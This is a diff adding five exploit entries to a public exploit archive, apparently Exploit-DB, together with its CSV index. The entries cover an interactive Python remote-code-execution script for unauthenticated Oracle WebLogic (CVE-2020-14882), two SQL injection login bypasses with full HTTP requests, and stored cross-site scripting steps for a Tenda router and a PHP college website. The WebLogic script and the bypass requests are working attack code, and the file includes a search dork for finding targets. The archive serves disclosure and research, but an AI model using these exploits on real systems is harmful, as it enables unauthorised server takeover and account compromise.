diff --git a/exploits/hardware/webapps/49478.txt b/exploits/hardware/webapps/49478.txt new file mode 100644 index 000000000..3f40b425e --- /dev/null +++ b/exploits/hardware/webapps/49478.txt @@ -0,0 +1,18 @@ +# Exploit Title: Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting +# Exploit Author: Chiragh Arora +# Hardware Model: Tenda AC5 AC1200 +# Firmware version: V15.03.06.47_multi +# Tested on: Kali Linux +# CVE ID: CVE-2021-3186 +# Date: 25.01.2021 + +########################################################################## + +Steps to Reproduce - + + - Navigate to the Tenda AC1200 gateway with 192.168.0.1 + - Follow up to the WiFi Settings and click the “WiFi Name & Password” option there. + - Manipulate the WiFi Name with "" + - Click the “Save” button & as the page refresh, you’ll got an alert stating “1” within it. + +Note: It doesn’t matter which Network Name parameter (2.4 GHz or 5 GHz) you’re manipulating, you’ll encounter the popup over in both of them. \ No newline at end of file diff --git a/exploits/java/webapps/49479.py b/exploits/java/webapps/49479.py new file mode 100755 index 000000000..b577bccdf --- /dev/null +++ b/exploits/java/webapps/49479.py @@ -0,0 +1,91 @@ +# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated) +# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\" +# Date: 25/1/2021 +# Exploit Author: CHackA0101 +# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html +# Version: Oracle WebLogic Server, version 12.2.1.0 +# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux) +# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html +# CVE : CVE-2020-14882 + +# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md + +#!/usr/bin/python3 + +import requests +import argparse +import http.client +http.client.HTTPConnection._http_vsn = 10 +http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\' + +parse = argparse.ArgumentParser() +parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\') +args = parse.parse_args() + +proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'} +cmd_ = \\\"\\\" + +# Headers +headers = { + \\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\", + \\\"Accept\\\": \\\"application/json, text/plain, */*\\\", + \\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\", + \\\"Accept-Encoding\\\": \\\"gzip, deflate\\\", + \\\"Upgrade-Insecure-Requests\\\": \\\"1\\\", + \\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\", + \\\"Cache-Control\\\": \\\"max-age=0\\\", + \\\"Connection\\\": \\\"close\\\" +} + +# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation: +url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\" +url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\" + +form_data_ = \\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); +weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); +java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\"); +field.setAccessible(true); +Object obj = field.get(adapter); +weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj); +String cmd = req.getHeader(\\\"cmd\\\"); +String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd}; +if (cmd != null) { + String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next(); + weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req); + res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); + res.getServletOutputStream().flush(); + res.getWriter().write(\\\"\\\"); +}executeThread.interrupt(); +\\\");\\\"\\\"\\\" + +#data_ = parse.urlencode(form_data_) +results1 = requests.get(url, headers=headers) + +if results1.status_code == 200: + print(\\\"(Load Headers... \\\\n\\\") + print(\\\"(Data urlencode... \\\\n\\\") + print(\\\"(Execute exploit... \\\\n\\\") + print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\") + while True: + cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\") + if cmd_test == \\\"exit\\\": + break + else: + try: + cmd_ = cmd_test + headers = { + \\\'cmd\\\': cmd_, + \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\', + \\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\', + \\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\', + \\\'Connection\\\': \\\'close\\\', + \\\'Accept-Encoding\\\': \\\'gzip, deflate\\\', + \\\'Content-Length\\\': \\\'1244\\\', + \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\' + } + results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text + print(results_) + except: + pass +else: + print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\") \ No newline at end of file diff --git a/exploits/php/webapps/49475.txt b/exploits/php/webapps/49475.txt new file mode 100644 index 000000000..bda375beb --- /dev/null +++ b/exploits/php/webapps/49475.txt @@ -0,0 +1,36 @@ +# Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass) +# Exploit Author: Marco Catalano +# Date: 2021-01-25 +# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code +# Affected Version: 1.0 +# Vulnerable parameter: "user_email" (POST method) +# Tested on: Linux, PHP/7.4.11 + +Explaination: +The userAuthentication function defined in "/include/accounts.php" implements the following code: + +$mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'"); + +which is called when trying to log into the administrative panel at "/admin/login.php". + +Proof Of Concept: + +The user input is not properly sanitized and this leads to authentication bypass through the classic "' or '1' = '1 -- -" where has to be a valid username. For example, the default username is "janobe". + + +POST /admin/login.php?logout=1 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 69 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/admin/login.php?logout=1 +Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj +Upgrade-Insecure-Requests: 1 + +user_email=janobe%27+or+%271%27+%3D+%271--+-&user_pass=test&btnLogin= \ No newline at end of file diff --git a/exploits/php/webapps/49476.txt b/exploits/php/webapps/49476.txt new file mode 100644 index 000000000..016f47f9e --- /dev/null +++ b/exploits/php/webapps/49476.txt @@ -0,0 +1,38 @@ +# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass) +# Exploit Author: Marco Catalano (@stunn4) +# Date: 2021-01-25 +# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html +# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code +# Affected Version: 1.0 +# Vulnerable parameter: "name" (POST method) +# Tested on: Linux, PHP/7.4.11 + +Explaination: +The source of "/admin_pages/login.php" file defines the following lines of code: + +$name=$_POST['name']; +$password=$_POST['password']; +$result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'"); + +which are called when trying to log into the administrative panel at "/admin_pages/login.php" itself. + +Proof Of Concept: + +The user input is not properly sanitized and this leads to authentication bypass through the classic "' or '1' = '1 -- -" where has to be a valid username. For example, the default username is "florian". + + +POST /admin_pages/login.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 66 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/admin_pages/login.php +Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj +Upgrade-Insecure-Requests: 1 + +name=florian%27+or+%271%27+%3D+%271+--+-&password=test&login=Login \ No newline at end of file diff --git a/exploits/php/webapps/49477.txt b/exploits/php/webapps/49477.txt new file mode 100644 index 000000000..045034129 --- /dev/null +++ b/exploits/php/webapps/49477.txt @@ -0,0 +1,48 @@ +# Exploit Title: Simple College Website 1.0 - 'full' Stored Cross Site Scripting +# Exploit Author: Marco Catalano (@stunn4) +# Date: 2021-01-25 +# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html +# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code +# Affected Version: 1.0 +# Vulnerable parameter: "full" (POST method) +# Tested on: Linux, PHP/7.4.11 + +Explaination: +The source of "/admin_pages/admission.php" file defines the following lines of code: + +if (isset($_POST['add'])&&!empty($_POST['full'])) { + $full=$_POST['full']; + $query=mysqli_query($conn,"UPDATE `contents` SET `full_contents`='$full' WHERE `id`='2'"); + if ($query) { + echo "Page changed..!"; + } else if(!$query){ + echo "Page is not changed..!"; + } +} + + +which allow to an authenticated administrator to modify the source code of the page. +Every change is then reflected and the user-input is not properly sanitized, this leads to cross site scripting attacks. +An attacker may try to gain access to the admin panel using authentication bypass through sql injection exploit. + +Proof Of Concept: +The attacker is logged into the administrator panel and modifies the source code of admission.php page to inject javascript code as it follows: + + +POST /admin_pages/admission.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 71 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/admin_pages/admission.php +Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj +Upgrade-Insecure-Requests: 1 + +full=&add=Update+Contents + +The XSS payload is stored in the database, so a victim would browse http://127.0.0.1/admission.php and execute the XSS payload. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a0734ca12..f31de1c62 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43669,3 +43669,8 @@ id,file,description,date,author,type,platform,port 49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",2021-01-25,"Richard Jones",webapps,php, 49471,exploits/php/webapps/49471.txt,"Library System 1.0 - 'category' SQL Injection",2021-01-25,"Aitor Herrero",webapps,php, 49474,exploits/php/webapps/49474.rb,"Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)",2021-01-25,"Metin Yunus Kandemir",webapps,php, +49475,exploits/php/webapps/49475.txt,"Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php, +49476,exploits/php/webapps/49476.txt,"Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php, +49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php, +49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware, +49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,